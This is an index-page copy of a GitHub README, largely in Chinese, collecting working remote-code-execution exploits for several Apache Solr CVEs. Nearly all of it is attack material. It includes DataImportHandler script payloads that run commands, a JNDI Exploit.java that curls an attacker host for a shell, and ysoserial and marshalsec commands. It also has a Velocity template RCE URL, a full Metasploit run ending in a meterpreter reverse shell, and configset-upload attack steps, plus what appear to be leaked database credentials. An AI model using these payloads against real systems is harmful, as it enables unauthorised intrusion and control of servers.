Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Imanfeng/Apache-Solr-RCE
Apache Solr Exploits 🌟
https://github.com/Imanfeng/Apache-Solr-RCE
cve-2017-12629 cve-2018-8026 cve-2019-0192 cve-2019-0193 cve-2019-12409 cve-2019-17558 cve-2020-13957
Last synced: 3 months ago
JSON representation
Apache Solr Exploits 🌟
- Host: GitHub
- URL: https://github.com/Imanfeng/Apache-Solr-RCE
- Owner: Imanfeng
- Created: 2019-08-10T13:30:44.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2020-10-13T11:45:17.000Z (about 4 years ago)
- Last Synced: 2024-05-02T18:54:39.003Z (6 months ago)
- Topics: cve-2017-12629, cve-2018-8026, cve-2019-0192, cve-2019-0193, cve-2019-12409, cve-2019-17558, cve-2020-13957
- Homepage:
- Size: 9.28 MB
- Stars: 335
- Watchers: 7
- Forks: 61
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - Imanfeng/Apache-Solr-RCE - Apache Solr Exploits 🌟 (Others)
README
# Apache-Solr-Vulnerability
Apache Solr Some Exploits 🌟[CVE-2019-0193](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2019-0193)
[CVE-2019-0192](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2019-0192)
[CVE-2019-17558](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2019-17558)
[CVE-2017-12629](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2017-12629)
[CVE-2019-12409](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2019-12409)
[CVE-2020-13957](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2020-13957)
[CVE-2018-8026](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2018-8026)
## CVE-2019-0193
Apache Solr DataImportHandler RCE### 影响版本
Apache Solr < 8.2.0 并且开启了DataImportHandler模块(默认情况下该模块不被启用)### 漏洞利用
1.首先判读是否solr不需认证直接可访问后台(大多数均可访问)
2.判断是否存在collections
![1](pic/1.png)
3.判断collections是否可以使用dataimport功能
![2](pic/2.png)
4.debug模式修改configuration
原:
```xml
```
[1] 无回显 直接执行命令修改:
(1)在entity中添加transformer="script:f1",f1为函数名
(2)添加内容
(3)execute with this configuration
```xml
<dataConfig>
<dataSource type="JdbcDataSource"
driver="com.microsoft.sqlserver.jdbc.SQLServerDriver"
url="jdbc:sqlserver://SqlServer;databaseName=TrainUpCore"
user="pid.trainup"
password="S@cram3nt0"
readOnly="true"
/>
<script><![CDATA[
function f1(row){
java.lang.Runtime.getRuntime().exec("powershell xxx");
return row;
}
]]>
```
![3](pic/3.png)
[2] 有回显 直接执行命令修改:
(1)在entity中添加transformer="script:f1",f1为函数名
(2)添加内容,将执行回显输出到field的参数重,如id、ItemDescription,若不行则需结合managed-schema配置输出
(3)execute with this configuration
```xml
<dataConfig>
<dataSource type="JdbcDataSource"
driver="com.microsoft.sqlserver.jdbc.SQLServerDriver"
url="jdbc:sqlserver://SqlServer;databaseName=TrainUpCore"
user="pid.trainup"
password="S@cram3nt0"
readOnly="true"
/>
<script><![CDATA[
function f1(row){
row.put("id",new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("whoami").getInputStream())).readLine());
return row;
}
]]>
```
![4](pic/4.png)
[3] JNDI+LDAP(无需目标的CLASSPATH存在数据库驱动):
(1)修改configuration内容
```xml
```
(2)hackserver
Exploit.java
```java
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.*;
import java.util.Hashtable;public class Exploit implements ObjectFactory {
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable, ?> environment) {
try {
Runtime.getRuntime().exec("curl http://xxx.xxx.xxx.xxx:1212/getshell");
} catch (IOException e) {
e.printStackTrace();
}
return null;
}
}
```JDK 高版本会限制远程codebase 加载,期待1.8以下
```
javac --release 7 Exploit.javajava -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndiDAPRefServer http://xxx.xxx.xxx.xxx:8888/#Exploit 1389
python3 -m http.server 8888
``` (3)execute with this configuration
![5](pic/5.png)
### 工具利用
https://github.com/Rapidsafeguard/Solr-RCE-CVE-2019-0192/blob/master/solr_RCE.py
https://github.com/weTomorrow/solr_poc/blob/master/solr_poc.py## CVE-2019-0192
### 影响版本
Apache Solr 5.0.0-5.5.5 版本
Apache Solr 6.0.0-6.6.5 版本
### 漏洞利用
configAPI主要功能是检索或修改配置。 GET负责检索,POST负责执行命令。通过传入set-property属性,构造恶意的数据,传入指向恶意的rmi服务器的链接,覆盖之前服务器的原设置,使得目标服务器与攻击者的恶意rmi服务器相连,攻击者可以使用ysoserial工具,通过rmi服务器向远端目标服务器发送命令,并在目标服务器上执行,实现远程命令执行
1.首先判读存在cores节点
```
http://ip:port/solr/admin/cores?wt=json
```![7](pic/7.png)
```
http://ip:port/solr/name[0]/config
```![8](pic/8.png)
2.server通过ysoserial部署RMI server
```
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1234 Jdk7u21 "cmd"
```![9](pic/9.png)
注意: 你会看到返回中出现500错误
如果错误中包含: “Non-annotation type in annotation serial stream” 说明 Apache Solr 的Java版本 > JRE 7u25,则PoC执行不成功。
如果你看到错误中包含: “undeclared checked exception; nested exception is”,则PoC执行成功.
### 工具利用
https://github.com/mpgn/CVE-2019-0192/blob/master/CVE-2019-0192.py
## CVE-2019-17558
### 影响版本
Apache Solr 5.x到8.2.0版本
### 漏洞利用
```
http://ip:port/solr/+core_name+/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
```![6](pic/6.png)
### 工具利用
https://github.com/wyzxxz/Apache_Solr_RCE_via_Velocity_template
## CVE-2017-12629
### 影响版本
Apache Solr 5.5.0到7.0.1版本
### 漏洞利用
此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。https://paper.seebug.org/425/
## CVE-2019-12409
### 影响版本
APACHE SOLR 8.1.1/8.2.0 CONFIGURATION FILE SOLR.IN.SH PRIVILEGE ESCALATION### 漏洞利用
Apache Solr的8.1.1和8.2.0发行版中的默认配置文件solr.in.sh,在其配置文件中ENABLE_REMOTE_JMX_OPTS字段默认配置不安全.如果使用受影响版本中的默认配置,那么将启用JMX监视服务并将对公网监听一个18983的RMI端口,且无需进行任何身份验证,配合JMX RMI将会导致远程代码执行.使用Metasploit
```
msf5 > use multi/misc/java_jmx_server
msf5 exploit(multi/misc/java_jmx_server) > show optionsModule options (exploit/multi/misc/java_jmx_server):
Name Current Setting Required Description
---- --------------- -------- -----------
JMXRMI jmxrmi yes The name where the JMX RMI interface is bound
JMX_PASSWORD no The password to interact with an authenticated JMX endpoint
JMX_ROLE no The role to interact with an authenticated JMX endpoint
RHOSTS yes The target address range or CIDR identifier
RPORT yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)Exploit target:
Id Name
-- ----
0 Generic (Java Payload)msf5 exploit(multi/misc/java_jmx_server) > set RHOSTS a.a.a.a
RHOSTS => a.a.a.a
msf5 exploit(multi/misc/java_jmx_server) > set RPORT 18983
RPORT => 18983
msf5 exploit(multi/misc/java_jmx_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_jmx_server) > show optionsModule options (exploit/multi/misc/java_jmx_server):
Name Current Setting Required Description
---- --------------- -------- -----------
JMXRMI jmxrmi yes The name where the JMX RMI interface is bound
JMX_PASSWORD no The password to interact with an authenticated JMX endpoint
JMX_ROLE no The role to interact with an authenticated JMX endpoint
RHOSTS a.a.a.a yes The target address range or CIDR identifier
RPORT 18983 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen portExploit target:
Id Name
-- ----
0 Generic (Java Payload)msf5 exploit(multi/misc/java_jmx_server) > set LHOST b.b.b.b
LHOST => b.b.b.b
msf5 exploit(multi/misc/java_jmx_server) > run
[*] Started reverse TCP handler on b.b.b.b:4444
[*] a.a.a.a:18983 - Using URL: http://b.b.b.b:8080/OcbYS8uaTPDH
[*] a.a.a.a:18983 - Sending RMI Header...
[*] a.a.a.a:18983 - Discovering the JMXRMI endpoint...
[+] a.a.a.a:18983 - JMXRMI endpoint on a.a.a.a:18983
[*] a.a.a.a:18983 - Proceeding with handshake...
[+] a.a.a.a:18983 - Handshake with JMX MBean server on a.a.a.a:18983
[*] a.a.a.a:18983 - Loading payload...
[*] a.a.a.a:18983 - Replied to request for mlet
[*] a.a.a.a:18983 - Replied to request for payload JAR
[*] a.a.a.a:18983 - Executing payload...
[*] a.a.a.a:18983 - Replied to request for payload JAR
[*] Sending stage (53867 bytes) to a.a.a.a
[*] Meterpreter session 1 opened (a.a.a.a:4444 -> b.b.b.b:46582) at 2019-11-21 15:24:53 +0000meterpreter >
```### 工具利用
https://github.com/siberas/sjet## CVE-2020-13957
### 影响版本
Apache Solr 6.6.0 - 6.6.5
Apache Solr 7.0.0 - 7.7.3
Apache Solr 8.0.0 - 8.6.2
### 漏洞利用
Apache Solr Configset Api上传功能存在未授权漏洞。攻击者可以上传含有恶意配置的solrconfig.xml从而触发CVE-2019-17558进行命令执行(SolrCloud模式才可利用)
1.首先构造含有恶意配置的myconfigset.zip
![10](pic/10.png)
2.上传myconfigset.zip进入ZooKeeper
```
curl -X POST --header "Content-Type:application/octet-stream" --data-binary @myconfigset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=test3myConfigSet"
```![11](pic/11.png)
3.从Zookeeper中选择恶意的solrconfig.xml创建新的Collection
```
curl -v "http://localhost:8983/solr/admin/collections?action=CREATE&name=newCollection3&numShards=2&replicationFactor=1&wt=xml&collection.configName=test3myConfigSet"
```![12](pic/12.png)
4.EXP命令执行
```
curl -v "http://127.0.0.1:8983/solr/newCollection3/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
```![13](pic/13.png)
## CVE-2018-8026
### 影响版本
Apache Solr >= 6.0.0, < 6.6.5
Apache Solr >= 7.0.0, < 7.4.0
### 漏洞利用
这次的XXE漏洞依赖于SolrCloud API,影响到SolrCloud分布式系统。而SolrCloud需要用到zookeeper```
import requestsupload_url = "http://127.0.0.1:8983/solr/admin/configs?action=UPLOAD&name=evilconfig"
files = open("evil.zip", "rb")
print(requests.post(upload_url, data=files).text)create_url = "http://127.0.0.1:8983/solr/admin/collections?action=CREATE&name=eviltest&numShards=1&collection.configName=evilconfig"
print(requests.get(create_url).text)
```https://xz.aliyun.com/t/2448